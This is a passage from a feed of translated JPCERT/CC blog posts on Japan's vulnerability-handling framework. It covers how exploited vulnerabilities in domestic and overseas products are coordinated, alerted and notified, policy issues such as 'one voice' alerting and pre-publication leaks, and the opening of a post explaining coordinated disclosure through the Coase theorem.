<figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E6%83%85%E5%A0%B1%E3%83%8F%E3%83%B3%E3%83%89%E3%83%AA%E3%83%B3%E3%82%B0%E3%81%AE%E5%90%84%E5%88%A4%E6%96%AD%E8%A6%81%E7%B4%A0%E3%81%A8%E5%90%84%E7%B5%84%E7%B9%94%E3%81%AE%E3%82%A2%E3%82%AF.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881478 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E6%83%85%E5%A0%B1%E3%83%8F%E3%83%B3%E3%83%89%E3%83%AA%E3%83%B3%E3%82%B0%E3%81%AE%E5%90%84%E5%88%A4%E6%96%AD%E8%A6%81%E7%B4%A0%E3%81%A8%E5%90%84%E7%B5%84%E7%B9%94%E3%81%AE%E3%82%A2%E3%82%AF-640wri.png" alt="" width="640" height="351"></a> <figcaption>Figure 1: Decision factors in handling vulnerability exploitation information / actions of each organization</figcaption> </figure>
<h4>The various patterns of vulnerability exploitation</h4> <hr> <p>Vulnerability exploitation incidents can, very roughly, be classified into the patterns below. Zero-day incidents in domestic products with global impact, for example, have hardly ever occurred, so we omit them here and explain the cases JPCERT/CC most often handles: Case A (zero-day incidents in domestic products), Case B (zero-day incidents in overseas products), and Case C (N-day incidents in overseas products).</p>
<table style="border-collapse: collapse; width: 100%;" border="1"> <thead> <tr> <th>Domestic or overseas product</th> <th>Zero-day or N-day attack</th> <th>Scope of impact: domestic, mainly overseas, or global (including Japan)</th> <th>Covered in this article</th> </tr> </thead> <tbody> <tr> <td rowspan="4">Domestic product</td> <td rowspan="2">Zero-day</td> <td>Impact basically domestic</td> <td><strong>Explained as Case A</strong></td> </tr> <tr> <td>Global impact</td> <td>(almost no cases)</td> </tr> <tr> <td rowspan="2">N-day</td> <td>Impact basically domestic</td> <td>Not covered here for reasons of space</td> </tr> <tr> <td>Global impact</td> <td>(almost no cases)</td> </tr> <tr> <td rowspan="4">Overseas product</td> <td rowspan="2">Zero-day</td> <td>Almost no domestic impact</td> <td>-<br>(no alerts or other information issued)</td> </tr> <tr> <td>Global impact</td> <td><strong>Explained as Case B</strong></td> </tr> <tr> <td rowspan="2">N-day</td> <td>Almost no domestic impact</td> <td>-<br>(no alerts or other information issued)</td> </tr> <tr> <td>Global impact</td> <td><strong>Explained as Case C</strong></td> </tr> </tbody> </table>
<h5>&lt;Case A: zero-day incidents in domestic products&gt;</h5> <p>For domestic products, on receiving a report or consultation from a discoverer, a victim organization, or the product developer, the vulnerability is identified, a fix is prepared by the product developer, and coordination toward publication is carried out. As explained in the first part, in Japan JPCERT/CC, designated as the coordinating body under the "Information Security Early Warning Partnership", coordinates with the product developer. Where exploitation damage has already occurred domestically, coordination is carried out together with incident response support and information-sharing activities, and the cause (the exploited vulnerability) is identified from information provided by the victim organizations. Multiple parties, including the victim organization, the organization conducting the investigation, JPCERT/CC, and the product developer, work together to coordinate the vulnerability publication and the alert about its exploitation.</p>
<figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E5%9B%BD%E5%86%85%E8%A3%BD%E5%93%81%E6%82%AA%E7%94%A8%E6%99%82%E3%81%AE%E5%AF%BE%E5%BF%9C.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881658 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E5%9B%BD%E5%86%85%E8%A3%BD%E5%93%81%E6%82%AA%E7%94%A8%E6%99%82%E3%81%AE%E5%AF%BE%E5%BF%9C-640wri.png" alt="" width="640" height="431"></a> <figcaption>Figure 2: Response when a domestic product is exploited</figcaption> </figure>
<p><strong>〇 Mediation, coordination, and verification between the victim-side investigation and the manufacturer-side investigation</strong><br>In the first part we touched on the problem of miscommunication caused by the asymmetry of knowledge between vulnerability discoverers and product developers; the same problem exists when responding to exploitation incidents. For example, there are cases where the product developer, lacking knowledge and information about the attack, cannot accurately understand the possible vulnerability and remediation method that the victim organization points out from its investigation results, and the fix ends up being insufficient. In addition, because the victim side is often subject to restrictions on information handling, such as NDAs covering the investigation or reporting obligations to government agencies, there is a risk that insufficient information reaches the product developer and the identification, verification, and remediation of the vulnerability end up incomplete.<br>Conversely, there are cases where the investigators on the victim side lack knowledge and information about the product and misidentify (or incompletely identify) the vulnerability or where it occurs. In such cases JPCERT/CC, which is both a coordinating body and an incident response organization, mediates and coordinates toward an appropriate fix.</p>
<p>Also, when the victim organizations recognized and investigated up to that point are limited, or when the attacker has erased traces or the vulnerability/attack leaves very few traces, it may be necessary to distribute and query indicator information other than the vulnerability itself through information-sharing activities, find other victims of the same actor, and fill in the missing artifacts and information.<br>Furthermore, it is also necessary to check whether the same actor is exploiting multiple vulnerabilities (it cannot be ruled out that multiple vulnerabilities in the same product are being chained, or that vulnerabilities in multiple products are being exploited within the same attack campaign), so from the standpoint of responding to the attack campaign, the investigation results of the victim side and the manufacturer side need to be linked to each other.<br>JPCERT/CC's role as a coordinating body is therefore not simply that of a "liaison" but also that of a "coordinator" and "verifier" who ensures that this exchange and verification of information proceeds smoothly.</p>
<figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E9%96%A2%E4%BF%82%E8%80%85%E9%96%93%E3%81%A7%E8%A1%8C%E3%82%8F%E3%82%8C%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E6%A4%9C%E8%A8%BC%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E5%90%84%E5%88%A4-81694d.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881660 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E9%96%A2%E4%BF%82%E8%80%85%E9%96%93%E3%81%A7%E8%A1%8C%E3%82%8F%E3%82%8C%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E3%81%AB%E9%96%A2%E3%81%99%E3%82%8B%E6%A4%9C%E8%A8%BC%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AE%E5%90%84%E5%88%A4-81694d-640wri.png" alt="" width="640" height="360"></a> <figcaption>Figure 3: Verification of vulnerability exploitation carried out between discoverer, coordinating body, and product developer (and the decision factors for it)</figcaption> </figure>
<p><strong>〇 Discovering and supporting other victims of the zero-day attack</strong><br>Separately from vulnerability coordination, indicator information is distributed as part of incident response support and information-sharing activities in order to identify victim organizations that have not yet recognized their compromise. When the attack campaign is still ongoing and the matter is urgent, the vulnerability publication or alert is issued promptly as soon as a fix or similar is ready, disclosing IoC information and compromise-investigation methods, and this sometimes takes the place of this phase.<br>Also, for enterprise products the product developer is often able to contact and support its customers, so affected customers are frequently notified in advance of the vulnerability publication. Most precedents involve overseas products, but the product developer may be able to identify and notify customers with suspected compromise through product telemetry, remote support, and the like, and in some cases this is done before the vulnerability publication or alert.</p>
<p>By combining these various channels, namely information sharing, alerts, individual notification of victim organizations, and contact from the product developer, we work toward early detection of damage and prevention of its spread. The combination, order, and timing of these means are decided case by case according to the state of the attack activity (whether the campaign is ongoing or over), the progress of the fix, the scope of impact (scope of damage), and so on. There is no specific guideline or manual; coordination is done flexibly from the standpoint of responding to the attack campaign.</p>
<h5>&lt;Case B: zero-day incidents in overseas products; Case C: N-day incidents in overseas products&gt;</h5> <p>When exploitation of a vulnerability in an overseas product comes to light outside Japan first, and in particular when the vulnerability's impact spreads globally, advance information sharing with each country is carried out (though not in every case) by the specialist organizations, security vendors, or manufacturer that handled the matter in that country, and advance coordination is done so that alerts are issued in each country at the same time as the vulnerability publication.</p> <p>In the rare case that exploitation of a vulnerability in an overseas product comes to light in Japan first, the discoverer contacts the overseas manufacturer directly, via JPCERT/CC, or with JPCERT/CC copied on the communication.</p>
<p><strong>〇 Responding to changes in the threat landscape</strong><br>Previously, the typical response was: "the vulnerability was exploited in the past (zero-day attack), and the attack campaign has already ended by the time the vulnerability is published, but an alert is issued because the likelihood of exploitation by other actors is high."<br>Cases that have been increasing over the past few years, on the other hand, are "(X) cases where the attack campaign continues even after an alert is issued" and "(Y) cases where N-day attacks begin immediately after the vulnerability is published" (lower part of Figure 4).<br>To be precise, pattern (X) has two variants:</p> <p style="padding-left: 40px;">(X-1) cases where exploitation was discovered early and the vulnerability publication and alert could be issued during the attack campaign<br>(X-2) cases where attack activity continues even after the zero-day attack is discovered and the vulnerability is published</p> <p>For the former, we suspect the background is that wide-ranging attacks by so-called IAB-like actors<a href="#fn2">[2]</a> increase the chance of early discovery. The latter is also mostly exploitation by IAB-like actors; for example, in the case of the "Ivanti Connect Secure and Ivanti Policy Secure vulnerabilities (CVE-2023-46805 and CVE-2024-21887)" in January 2024<a href="#fn3">[3]</a>, it was confirmed<a href="#fn4">[4]</a> that UNC5221, in addition to the preceding zero-day attacks (December 2023), continued its attack activity immediately after the vulnerability publication and alert.</p>
<p>In cases where such IAB-like actors carry out zero-day or N-day attacks, tactics such as placing webshells on network appliances/edge devices are favored, so it is often possible to identify compromised hosts from the outside. Consequently, after an attack comes to light, many security vendors and researchers carry out scanning surveys, and "information on already-compromised hosts" is shared among international organizations.<br>JPCERT/CC sometimes conducts such surveys itself, but it also uses information provided from overseas to carry out notification operations to the organizations managing or using already-compromised hosts, in parallel with alerts and information sharing.<br>As a slight digression, such scan information sometimes circulates publicly via reports or social media, but some of it rests on inaccurate checks of whether the host is actually running an affected version, so we also vet this information.</p>
<figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B3_%E4%B8%BB%E3%81%AB%E6%B5%B7%E5%A4%96%E8%A3%BD%E5%93%81%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E7%99%BA%E7%94%9F%E6%99%82%E3%81%AE%E3%82%BF%E3%82%A4%E3%83%A0%E3%83%A9%E3%82%A4%E3%83%B3.png" class="mt-asset-link"><img class="asset asset-image at-xid-3881661 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B3_%E4%B8%BB%E3%81%AB%E6%B5%B7%E5%A4%96%E8%A3%BD%E5%93%81%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%E6%82%AA%E7%94%A8%E7%99%BA%E7%94%9F%E6%99%82%E3%81%AE%E3%82%BF%E3%82%A4%E3%83%A0%E3%83%A9%E3%82%A4%E3%83%B3-800wri.png" alt="" width="800" height="559"></a> <figcaption>Figure 4: Timeline of the response when a vulnerability (mainly in overseas products) is exploited</figcaption> </figure>
<p><strong>〇 Carrying out notification operations (especially in Case C)</strong><br>In addition to the individual notifications described above to organizations managing hosts that are externally known to be compromised, notification operations may also be carried out to organizations managing hosts that remain vulnerable after the vulnerability publication/alert.<br>In particular, we notify organizations managing hosts that are vulnerable but not yet compromised in cases where an exploit or PoC has been published and an unspecified large number of actors are in a position to exploit it, or where, as described above, IAB-like actors may continue to run an attack campaign.</p>
<p>We do not notify the organizations managing still-vulnerable hosts in every case. Our basic view is that vulnerability response should primarily consist of communication from the product developer and others to users followed by remediation, and that device management and tracking of vulnerability information should be done by the users themselves (or organizations they have contracted).<br>On the other hand, as we have noted in previous blog posts, there are problems<a href="#fn5">[5]</a> with the flow of vulnerability information through the market and distribution channels, and the reality is that in situations where the likelihood of attack is rising as described above, or an attack campaign is already underway, we have no choice but to carry out notification operations.</p>
<h4>Future issues</h4> <hr>
<p>So far we have introduced JPCERT/CC's current operations in response to vulnerability exploitation, but there are various issues, and moves toward improving the vulnerability response framework and capabilities may emerge in the future.<br>The "Recommendations for Improving Response Capabilities in the Field of Cyber Security" (hereafter "the Recommendations")<a href="#fn6">[6]</a>, published last November by the expert panel on improving response capabilities in the field of cyber security, make several references to vulnerability response and the issuing of alerts and other information. Focusing on the recommendations taken up by the expert panel, we briefly consider the issues in current operations and the points for future discussion.</p>
<h5>&lt;On speaking with "one voice" in urgent information dissemination&gt;</h5> <table style="border-collapse: collapse; width: 100%;" border="1"> <tbody> <tr> <td>(omitted) Currently, in addition to the National center of Incident readiness and Strategy for Cybersecurity (NISC), the police, the Ministry of Economy, Trade and Industry, JPCERT/CC, the Information-technology Promotion Agency, and others each issue information individually, but particularly urgent information should be issued with one voice so that no discrepancies arise between agencies. (Recommendations, page 3)</td> </tr> </tbody> </table> <p>Currently, each agency issues its own information (while also making use of information from JPCERT/CC), and there are not a few cases where agencies differ on whether or not to issue an alert about the same vulnerability. Fragmented information dissemination, with differences in the "tone" or technical content of what is issued, must be improved; on the other hand, the following points can be raised about "one voice":</p>
<p style="padding-left: 40px;"><strong>〇 The problem of speed</strong><br>As noted above, for exploitation of vulnerabilities with wide impact, especially in overseas products, we issue alerts within one day of publication<a href="#fn7">[7]</a>. If, for example, a multi-agency review process were introduced at the stage of considering an alert, speed could drop, and where positions differ, there is a risk that a somewhat compromised text would be adopted as the information issued.</p>
<p style="padding-left: 40px;"><strong>〇 The merits of multiple agencies issuing information and responding</strong><br>While the information issued does need to be aligned in some way, there is no need for a single issuing organization. "One voice" is not necessarily synonymous with consolidating the responding organizations into one. In the field of public administration, for example, it has been pointed out<a href="#fn8">[8]</a> that redundancy among multiple agencies suppresses the occurrence of errors and increases adaptability to environmental change. Under the current arrangement, the reach of each agency's information and support differs, and although the burden on recipients caused by duplication is a problem that must be resolved, viewed from the standpoint of redundancy this can also be interpreted as a multi-layered response structure.</p>
<h5>&lt;On the handling of information about exploitation&gt;</h5> <table style="border-collapse: collapse; width: 100%;" border="1"> <tbody> <tr> <td>Given that many vulnerabilities are published every year, so that users can identify which of the enormous volume of vulnerability information to address first, the government should, with reference to the "Known Exploited Vulnerabilities Catalog" published by the U.S. government, disseminate information on vulnerabilities exploited in Japan in a centralized and easy-to-understand way. (Recommendations, page 3)</td> </tr> </tbody> </table> <p style="padding-left: 40px;"><strong>〇 The urgency is unclear</strong><br>The current KEV indicates whether a vulnerability has been exploited by ransomware actors, but does not indicate when that exploitation occurred, whether an attack campaign is currently ongoing, or whether future exploitation is likely. Nor does it link to security vendors' analysis reports as evidence of exploitation.</p>
<p style="padding-left: 40px;"><strong>〇 Insufficient awareness of the domestic framework's efforts</strong><br>In the Information Security Early Warning Partnership, based on the findings of the FY2023 "Study Group on the Handling of Vulnerability Information in Information Systems", new provisions on the handling of information indicating exploitation were established and the related notification standard was revised<a href="#fn9">[9]</a>. Operation has already begun in FY2024, and for domestic products listed on JVN, the number of cases where information on exploitation status is published is gradually increasing. The expert panel did not mention the operation of this framework, but we believe the first task is to strengthen awareness of it.</p>
<h5>&lt;On scanning and notification operations&gt;</h5> <table style="border-collapse: collapse; width: 100%;" border="1"> <tbody> <tr> <td>Identifying vulnerabilities through external scanning and issuing alerts is also considered effective, but it should be noted that where accuracy is low, this can become an excessive burden on the organizations targeted by the alerts. (Recommendations, page 4)</td> </tr> </tbody> </table> <p>The cost burden on organizations receiving alerts is as explained in the earlier blog post<a href="#fn10">[10]</a> introduced above, and notification operations have the same problem. Notifications are not carried out only by JPCERT/CC; many "notifications" are made in Japan and abroad, by individuals as well as organizations. Commonly seen problems include cases where the basis (technical evidence) for judging that a host is compromised is unclear, and "one-way" notifications that do not present or support the method of investigating the compromise or the information needed for the investigation (such as timestamps).<br>In particular, in cases where an organization or individual that did not observe or respond to the attack campaign learns the compromise-investigation method and carries out scanning and notification, the information provided to notified organizations is often limited and support is insufficient. The same problems are often seen in notification activities by organizations that merely relay such discoverers'/investigators' information.</p>
<p>* Regrettably, even in the many notification operations JPCERT/CC carries out, there are cases where, for various reasons, we reflect that we were unable to fully provide the technical information needed for the investigation. Please send us your comments and complaints at any time.</p>
<h5>&lt;On the problem of only issuing information&gt;</h5> <p>Although not addressed in the expert panel's recommendations, there are also issues with what happens "after" information is issued. As explained in the first half of this article, when JPCERT/CC issues an alert, shares information, or carries out a notification operation, in addition to providing the information needed to investigate whether a compromise occurred, we also handle incident consultations from organizations where a suspected compromise has been found. In the vulnerability exploitation incidents involving network appliances/edge devices that have increased over the past few years, as discussed in this article, forensic investigation of the compromised device is a challenge. While IAB-like actors attack a wide range of devices internationally, for many products the operations and maintenance vendor cannot conduct a detailed investigation, so requests for investigation flood the manufacturer, and there are frequent cases where an answer cannot be obtained promptly. In such attacks, moreover, the investigation of whether lateral movement occurred after the device compromise is often insufficient, so support is needed through the subsequent investigation rather than ending with the issuance of an alert.<br>Currently, not all agencies that issue information have the capability and resources to carry out such investigations for every product, and as a result the response varies across the country as a whole.</p>
<h5>&lt;On the handling of pre-publication vulnerability/exploitation information&gt;</h5> <p>This is another point not addressed in the expert panel's recommendations. Under the current domestic framework, detailed information about unpublished vulnerabilities is handled among a very limited set of parties (IPA, JPCERT/CC, the manufacturer, and the discoverer). There are exceptions: since 2017, prioritized pre-publication provision of information ("priority information provision")<a href="#fn11">[11]</a> to the government and some critical infrastructure operators has been in place.<br>Although not institutional in the way Japan's is, such "prioritized (pre-publication) information provision" also exists overseas, for example Microsoft's MAPP (Microsoft Active Protections Program)<a href="#fn12">[12]</a>, through which Microsoft provides pre-publication vulnerability information to vendors and others.<br>On the other hand, such advance provision of pre-publication information has also led to trouble involving suspected pre-publication information leaks<a href="#fn13">[13]</a>. Under the current domestic framework, the recipients of priority information provision are limited at present, and detailed information is handled within the coordination phase (basically exchanges among the discoverer, JPCERT/CC, and the manufacturer), so even though the handling framework has no penalty provisions, the structure makes it relatively easy to identify the organization responsible should inappropriate handling occur. At the same time, as JPCERT/CC stated in its opinion<a href="#fn14">[14]</a> to the FY2023 "Study Group on the Handling of Vulnerability Information in Information Systems", manufacturers have raised concerns about expanding priority information provision, and if the number of players handling pre-publication vulnerability information grows, further discussion of measures against information leakage will be needed.</p>
<h4>Closing remarks</h4> <hr> <p>Japan is unusual in the world in having handled vulnerability information through public-private cooperation under a public framework. Overseas, coordination has basically been done directly and individually between discoverers and manufacturers, and as a result trouble such as unintended disclosure has occurred repeatedly. On the other hand, from what we can see through JPCERT/CC's daily international cooperation, the circulation of information about vulnerability exploitation overseas appears to be increasing day by day. We believe that the players who handle exploitation information, while experiencing various failures in vulnerability information handling, are gradually developing a shared sense of the norms and beginning to align their steps voluntarily.</p>
<p>In Japan, under the vulnerability notification framework, the players who circulate information about pre-publication vulnerability exploitation have in a sense been limited, but the number of players who handle and issue vulnerability exploitation information is expected to grow.<br>This May, the so-called Act on Strengthening Cyber Response Capabilities and the accompanying Act on Arrangement of Related Acts were enacted. Article 42 of the Strengthening Act provides for "requesting that necessary measures be taken to prevent damage from cyber attacks" from vendors and others of vulnerable products, and Article 7 of the amended Basic Act on Cybersecurity adds a responsibility provision (to strive for design and development that ensures users' cybersecurity, continuous provision of information, and so on)<a href="#fn15">[15]</a>. As the roles of government agencies and vendors expand, we intend to actively contribute JPCERT/CC's accumulated knowledge to future discussions on not only vulnerability publication but also how exploitation information should be handled, and at what timing and by what means the technical information users need for investigation should be provided.</p>
<h4>References</h4> <p><a name="fn1"></a>[1] METI, "Vulnerability-related information handling framework" https://www.meti.go.jp/policy/netsecurity/vulinfo.html</p> <p><a name="fn2"></a>[2] "IAB" has been treated as one category of crime-type actor, but in recent years division of labor within APT campaigns has become more common, and there are moves to define "IAB-like" actors in APT campaigns. Cisco Talos, "Redefining IABs: Impacts of compartmentalization on threat tracking and modeling", https://blog.talosintelligence.com/redefining-initial-access-brokers/</p> <p><a name="fn3"></a>[3] 2024/1/11 JPCERT/CC, "Alert regarding vulnerabilities in Ivanti Connect Secure and Ivanti Policy Secure (CVE-2023-46805 and CVE-2024-21887)" https://www.jpcert.or.jp/at/2024/at240002.html</p> <p><a name="fn4"></a>[4] 2024/4/5 Google/Mandiant, "Cutting Edge, Part 4: Ivanti Connect Secure VPN Post-Exploitation Lateral Movement Case Studies", https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en</p> <p><a name="fn5"></a>[5] JPCERT/CC Eyes, "Why are vulnerabilities in SSL-VPN products left unaddressed? On an attack cause overlooked behind the term 'supply chain' attack" https://blogs.jpcert.or.jp/ja/2022/07/ssl-vpn.html</p> <p><a name="fn6"></a>[6] https://www.cas.go.jp/jp/seisaku/cyber_anzen_hosyo/koujou_teigen/teigen.pdf</p> <p><a name="fn7"></a>[7] There are also cases where information is shared before publication, around the time of coordination between overseas agencies and the vendor.</p> <p><a name="fn8"></a>[8] 鈴木潔 (Suzuki Kiyoshi), "Cooperation among administrative organizations in measures to prevent the spread of COVID-19: redundancy, inter-agency cooperation, and leadership" (in Annals of the Japanese Society for Public Administration 57, "Redundancy in Public Administration")</p> <p><a name="fn9"></a>[9] https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html</p> <p><a name="fn10"></a>[10] JPCERT/CC Eyes: On the "cost" problem on the receiving side of alerts and information-sharing activities: so that issuing information does not become a self-serving act done for alibi or for show<br>https://blogs.jpcert.or.jp/ja/2023/05/cost-and-effectiveness-of-alerts.html</p> <p><a name="fn11"></a>[11] For priority information provision, see the Early Warning Partnership Guidelines.<br>https://www.ipa.go.jp/security/guide/vuln/ug65p90000019by0-att/partnership_guideline.pdf<br>The history of the discussions can be found in the past reports of the "Study Group on the Handling of Vulnerability Information in Information Systems" published on IPA's website. https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html</p> <p><a name="fn12"></a>[12] https://www.microsoft.com/en-us/msrc/mapp</p> <p><a name="fn13"></a>[13] Regarding the Microsoft SharePoint vulnerabilities (CVE-2025-53770 and others), whose zero-day exploitation came to light and was published in July 2025, Bloomberg reported that information may have leaked in advance via MAPP. The conclusion of this matter is still unknown at this time, but the WSJ reported a similar allegation regarding the 2021 Microsoft Exchange Server vulnerabilities (so-called ProxyShell).</p> <p><a name="fn14"></a>[14] "Study Group on the Handling of Vulnerability Information in Information Systems", FY2023 report, page 33 https://www.ipa.go.jp/security/reports/vuln/nq6ept000000ldxx-att/report2023.pdf</p> <p><a name="fn15"></a>[15] https://www.cyber.go.jp/pdf/council/cs/dai43/43shiryou4.pdf</p>
  50. Explanation: Operation of the Vulnerability-Related Information Handling Framework and Future Issues (Part 1): What Is Vulnerability Disclosure in the Public Interest?

    Fri, 12 Sep 2025 04:30:00 -0000

<p><strong>* The vulnerability-related information handling framework is operated together with METI and IPA, but this article was written by JPCERT/CC.</strong></p> <p>Japan has a track record of more than 20 years of operation based on the "Information Security Early Warning Partnership"<a href="#fn1">[1]</a><a href="#fn2">[2]</a>, and ahead of other countries has pursued so-called "coordinated vulnerability disclosure (CVD)" through public-private cooperation. Unfortunately, however, events that suggest understanding of the framework's operation has not spread sufficiently occur from time to time. Unless we go beyond merely interpreting what is written in laws and guidelines and consider "why does this mechanism exist / why is it needed", there is a risk that the framework (or its maintenance), which is a "means", becomes an end in itself, a mere formality, or so rigid that it no longer fits reality.</p>
<p>Although many discoverers and product developers are now involved in vulnerability coordination, from the standpoint of society and industry as a whole, not many organizations and people have much experience with it. As with incident response, what is published is only part of the content and the history; the coordination process and details are known only to a limited set of parties. This article considers the issues at the front line and the future from the perspective of JPCERT/CC, which serves as the "coordinating body" under the framework and also provides incident response support in cases of exploitation. This "first part" explains vulnerability coordination in "normal times", when there is as yet no likelihood of exploitation, and the second part introduces the various operations carried out when the likelihood of exploitation is rising or exploitation has already occurred.</p>
<p>For an overview of the various legal issues surrounding the handling of vulnerability-related information, the "Survey Report on Legal Aspects of the Handling of Vulnerability Information in Information Systems, revised edition"<a href="#fn3">[3]</a> by attorney 高橋郁夫 (Takahashi Ikuo) and colleagues is published on IPA's website; please refer to it first.</p>
<h4>Response in normal times</h4> <p>As mentioned above, under the "Information Security Early Warning Partnership" framework, Japan has pursued so-called "coordinated vulnerability disclosure (CVD)" through public-private cooperation ahead of other countries.</p> <p>Overseas, coordination has basically been done directly and individually between discoverers and manufacturers, and as a result trouble such as unintended disclosure has occurred repeatedly. Disclosures not based on cooperation between the two parties have been made repeatedly on grounds such as "the manufacturer does not acknowledge that this is a vulnerability, so we are disclosing it" or "we judge the public interest to be high, so we are publishing it". There has also been repeated trouble where, despite the discoverer having pointed out a vulnerability, no good-faith response was obtained from the manufacturer. On the other hand, more countries have recently begun promoting CVD and more manufacturers have declared their response policies, and the players who handle vulnerability information, while experiencing various failures in vulnerability information handling, are gradually developing a shared sense of the norms and aligning their steps voluntarily.</p>
<p>Vulnerability information is negative information for the manufacturer, while for the discoverer it is positive information that demonstrates the results and capabilities of their activities. For users, it is positive information in that a problem is resolved, but it becomes negative information if uncontrolled disclosure leads to exploitation. Against this background, Japan's vulnerability information handling framework is based on publication by the manufacturer after coordination, and the discoverer can be credited at the time of publication (listing on JVN). Using JVN as the venue, the manufacturer's disclosure and the discoverer's disclosure can be smoothly linked.<br>As explained in a previous blog post<a href="#fn4">[4]</a>, this mechanism can be described as one that uses information efficiently and avoids, as far as possible, negative externalities in which information is "consumed" for the benefit of a single individual or organization at a cost to others.</p>
<h4>Why does the coordination framework exist?</h4>
<p>The relationship between an attacker who exploits a vulnerability and the manufacturer of the exploited product is that of "perpetrator" and "victim", but the relationship between the discoverer of a vulnerability and the manufacturer is not. As an approach to conflicts of interest that cannot be captured in a simple "perpetrator"/"victim" picture, the fields of economics and law sometimes use the idea of the "Coase theorem". The Coase theorem is the theorem that "the most efficient outcome is achieved" through private bargaining between the parties.</p> <table style="border-collapse: collapse; width: 100%;" border="1"> <tbody> <tr> <td> <p>When transaction costs are sufficiently small, the boundaries and location of rights are clear, and promises are enforced, the final allocation of resources is the same regardless of how legal rules assign rights (the most efficient outcome is achieved through private bargaining between the parties).</p> <p style="padding-left: 440px;">(Source: 飯田高 (Iida Takashi), 『法と社会科学をつなぐ』 [Connecting Law and the Social Sciences] (Yuhikaku), page 136)</p> </td> </tr> </tbody> </table> <p>* Strictly speaking, the Coase theorem is a way of thinking used for adjusting and resolving negative externalities such as pollution between the parties, and the relationship between a vulnerability discoverer and a manufacturer is not strictly a negative externality; we cite it because its approach to resolution can be borrowed.</p>
<p>Transaction costs are "the general term for costs arising when carrying out a transaction: the cost of finding a counterparty, the cost of conducting negotiations and drafting agreements, the cost of monitoring performance and sanctioning violations, and costs associated with strategic behavior"<a href="#fn5">[5]</a>. Applied to vulnerability coordination work, these become roughly:</p> <p style="padding-left: 40px;">"cost of finding a counterparty → the cost of finding the manufacturer's appropriate contact point for negotiation"<br>"cost of conducting negotiations and drafting agreements → the (verification) work of finding a landing point between the discoverer's claims and the manufacturer's claims"<br>"cost of monitoring performance and sanctioning violations → progress management up to publication"<br>"costs associated with strategic behavior → reconciling the discoverer's objectives (conference presentation, showcasing the company's capabilities, public interest, etc.) with the manufacturer's strategy (minimizing reputational damage)"</p> <p>The Coase theorem can also be read as a theory suggesting that "some rule or framework is needed" in situations such as vulnerability coordination where many transaction costs arise. Without a coordination framework, when discoverer and manufacturer negotiate directly, both bear all of the transaction costs; but there is no pre-existing relationship of trust between the two (rather, their claims and interests may conflict from the outset), and there are also asymmetries in knowledge and information about vulnerabilities and security technology (the manufacturer is not necessarily well versed in security, and the discoverer may not be technically familiar with the product). Because the transaction costs are so high, coordination stalls, and moves emerge to achieve individual objectives (e.g., making the vulnerability known) without bearing the transaction costs (e.g., unilateral disclosure without reaching agreement).</p>
<p>The vulnerability information handling framework can be thought of as a framework that reduces the transaction cost burden on both sides and makes negotiation more efficient by setting out handling rules in advance and providing a coordinator. It benefits not only first-time discoverers and manufacturers making their first fix, but also players who use the framework repeatedly: the more they use it, the more they reduce transaction costs and improve efficiency.</p>
<figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B31_%E8%84%86%E5%BC%B1%E6%80%A7%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%81%AB%E3%81%8A%E3%81%91%E3%82%8B%E8%AA%BF%E6%95%B4%E5%88%B6%E5%BA%A6%E3%81%AE%E6%84%8F%E5%91%B3.png" class="mt-asset-link"><img class="asset asset-image at-xid-3861096 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B31_%E8%84%86%E5%BC%B1%E6%80%A7%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%81%AB%E3%81%8A%E3%81%91%E3%82%8B%E8%AA%BF%E6%95%B4%E5%88%B6%E5%BA%A6%E3%81%AE%E6%84%8F%E5%91%B3-800wri.png" alt="" width="800" height="350"></a> <figcaption>Figure 1: The meaning of the coordination framework in vulnerability disclosure</figcaption> </figure>
